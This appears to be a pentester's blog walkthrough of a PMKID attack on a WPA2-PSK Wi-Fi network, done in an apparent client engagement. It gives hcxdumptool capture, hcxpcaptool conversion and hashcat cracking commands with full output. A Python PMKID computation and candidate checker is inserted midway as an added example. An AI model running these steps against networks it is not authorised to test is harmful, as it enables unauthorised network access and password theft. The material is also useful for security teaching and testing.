PMKID Attack Using hcxdumptool and Hashcat

While the technique is a bit older, I recently pulled off a PMKID attack and wanted to share the steps.

PMKID Attack - Introduction

If you've never heard of the PMKID attack, then I recommend reading the original hashcat post.

This is a client-less attack that doesn't need a 4-way handshake or a special output format.

For another walkthrough, you can also visit the following post.

Targeting the Network

First, you will need to use hcxdumptool to capture the WLAN traffic. Note that not all drivers work out of the box; the following chipsets are recommended.

  • USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
  • USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
  • USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
  • USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
  • USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Note that I performed this attack with a different card, which requires some additional setup.

PMKID - Alfa AC1200

root@kali:~# lsusb
Bus 004 Device 003: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter

With my Alfa card in monitor mode, I was ready to begin.

root@kali:~# iwconfig
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=30 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

First, I used airodump-ng to grab the BSSID of my target network.

 CH  6 ][ Elapsed: 48 s ][ 2019-02-26 13:00                                         
                                                                                                          
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                       
                                                                                                          
 18:31:xx:xx:xx:xx  -67  17      266        0    0   6  130  WPA2 CCMP   PSK  TARGETNETWORK   

Once I obtained the BSSID, I added it to a filter file. While more than one BSSID can exist in this file, I was only targeting this specific network.

root@kali:~# echo "18xxxxxxxxxx" > myfilter.txt

Performing the Attack

With my filter in place, I could now use hcxdumptool to collect packets.

I was able to capture a PMKID hash very quickly, which was awesome!

root@kali:~# hcxdumptool -o capture.pcap -i wlan0 --enable_status=1 --filterlist=myfilter.txt
initialization...

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: dc701431xxxx
MAC ACCESS POINT.........: 48f317b472b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65198
ANONCE...................: 7281156220ed9e68c9f974df2f98d10b7c800270b49e1004ad5dc1ad3e2662b0

[13:07:58 - 006] 841b5ee0xxxx -> a04ea7a4xxxx [FOUND PMKID]

Next, I used hcxpcaptool to convert the capture into a hash format that hashcat can use.

root@kali:~# hcxpcaptool -z pmkid_hash.txt capture.pcap 

reading from capture.pcap
                                                
summary:                                        
--------
file name....................: capture.pcap
file type....................: pcapng 1.0
file hardware information....: i686
file os information..........: Linux 4.19.0-kali1-686-pae
file application information.: hcxdumptool 5.1.3
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 88
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 88
beacons (with ESSID inside)..: 9
probe requests...............: 14
probe responses..............: 11
association requests.........: 7
association responses........: 7
authentications (OPEN SYSTEM): 38
authentications (BROADCOM)...: 22
authentications (APPLE)......: 4
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to pmkid_hash.txt

Cracking the Hash

To crack these hashes using hashcat, you will need at least version 4.2.0.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat --version
v4.2.1

After verifying that I had an up-to-date version, I set about cracking the hash.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -r ~/tools/cracking/best64.rule pmkid_hash.txt ~/tools/cracking/rockyou.txt
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104517568
* Runtime...: 1 sec

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: f4fxxxxxxxxxxxxxxxxxxxxxxxxxxxxx*84xxxxxxxxxx*axxxx...6xxxxx
Time.Started.....: Tue Feb 26 14:17:20 2019 (28 secs)
Time.Estimated...: Tue Feb 26 18:57:06 2019 (4 hours, 39 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5477 H/s (7.38ms) @ Accel:8 Loops:4 Thr:256 Vec:1
Speed.Dev.#3.....:    59229 H/s (8.04ms) @ Accel:32 Loops:16 Thr:256 Vec:1
Speed.Dev.#*.....:    64706 H/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 20165670/1104517568 (1.83%)
Rejected.........: 18445350/20165670 (91.47%)
Restore.Point....: 0/14344384 (0.00%)
Candidates.#2....: 123456789 -> Iloveyou85
Candidates.#3....: iloveyou348 -> footiecrazy8

Unfortunately, I was unable to crack the hash in this specific scenario. That said, I was able to prove the vulnerability and convince them to switch away from PSK.

In lieu of a fun screenshot of me connecting, I give you a picture of my co-worker's awesome antenna.

PMKID - 20dBi Antenna

I also wanted to point out that cracking PMKID hashes is around twice as fast as cracking standard EAPOL handshakes! This makes the attack even more enticing, as the PBKDF2 key derivation behind WPA2-PSK is notoriously slow.
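To make the hash file and the speed comparison concrete, here is an added example (not from the original post or from the hcxtools/hashcat projects) that builds and checks a mode 16800 line as hcxpcaptool writes it: PMKID*MAC_AP*MAC_STA*ESSID(hex). Per guess, the work is one PBKDF2-HMAC-SHA1 (4096 rounds) to get the PMK and one HMAC-SHA1 to get the PMKID, which is also why no client handshake is needed; the MACs and passphrase below are constructed, only the ESSID comes from the post.

```python
import hashlib
import hmac


def pmkid_for(passphrase: str, essid: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes);
    PMKID = first 16 bytes of HMAC-SHA1(PMK, "PMK Name" | MAC_AP | MAC_STA)."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def to_16800(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, essid: bytes) -> str:
    """Format one line the way hcxpcaptool -z writes it for hashcat -m 16800."""
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), essid.hex()])


def parse_16800(line: str):
    """Split a 16800 line back into (pmkid, mac_ap, mac_sta, essid) bytes."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(essid_hex))


def check_candidates(line: str, candidates):
    """Return the first candidate passphrase whose PMKID matches the line, else None.
    This is the per-guess work hashcat performs for mode 16800."""
    pmkid, mac_ap, mac_sta, essid = parse_16800(line)
    for cand in candidates:
        if not 8 <= len(cand) <= 63:  # WPA2-PSK passphrase length limits (see hashcat output)
            continue
        if hmac.compare_digest(pmkid_for(cand, essid, mac_ap, mac_sta), pmkid):
            return cand
    return None


# Constructed sample: MACs and passphrase are made up; the ESSID is the one from the post.
ESSID = b"TARGETNETWORK"
MAC_AP = bytes.fromhex("183100000001")
MAC_STA = bytes.fromhex("dc7014000002")
KNOWN_PASSPHRASE = "Summer2019!"
SAMPLE_LINE = to_16800(pmkid_for(KNOWN_PASSPHRASE, ESSID, MAC_AP, MAC_STA),
                       MAC_AP, MAC_STA, ESSID)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(check_candidates(SAMPLE_LINE, ["password", "short", "Summer2019!"]))
```

Feeding SAMPLE_LINE to hashcat -m 16800 with a wordlist containing the constructed passphrase recovers it, which is a handy way to validate a capture setup against a lab network whose passphrase you already know.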

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 16800 - WPA-PMKID-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6631 H/s (53.86ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    59876 H/s (66.06ms) @ Accel:128 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    66507 H/s

Started: Thu Feb 28 16:05:21 2019
Stopped: Thu Feb 28 16:05:31 2019
Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 2500 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 2500 - WPA-EAPOL-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6634 H/s (53.85ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    26169 H/s (75.92ms) @ Accel:64 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    32803 H/s

Started: Thu Feb 28 16:05:36 2019
Stopped: Thu Feb 28 16:05:44 2019

PMKID Attack - Conclusion

While I wasn't able to perform a complete compromise, this was still an awesome attack to do. I definitely plan on using it, as well as researching it, further.

Note that EAPHammer can also do this attack, and I may share a post with that technique as well.

If you have any other suggestions for wireless gear or techniques that I should try, then please reach out!

doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.
